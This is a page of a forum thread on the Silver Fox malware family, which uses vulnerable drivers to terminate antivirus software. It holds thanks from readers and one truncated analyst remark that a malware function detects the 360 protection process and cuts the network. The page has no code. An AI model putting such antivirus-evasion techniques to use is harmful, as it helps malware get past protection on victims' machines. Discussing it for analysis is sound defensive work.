Topic: The continuously evolving Silver Fox (银狐): adding ever more vulnerable drivers to terminate antivirus software via BYOVD
Posted by z3960 on 2026-02-21 07:49
Next page | Previous page  (2/23)
Replies (7):
7 # hanxiao129
02-22 20:31
Looks pretty good.
6 # hanxiao129
02-22 20:30
Good stuff on Silver Fox.
5 # hanxiao129
02-22 20:30
Thanks to the OP for sharing.
4 # huwg
02-21 16:56
Thanks for sharing.
3 # huwg
02-21 16:56
Taking a look.
2 # huwg
02-21 16:56
Came to have a look.
1 # z3960
02-21 07:50
This function detects the 360 main-protection process and, if it is present, disconnects the network. Specifically: the function calls the "IS360PROCES .." in the code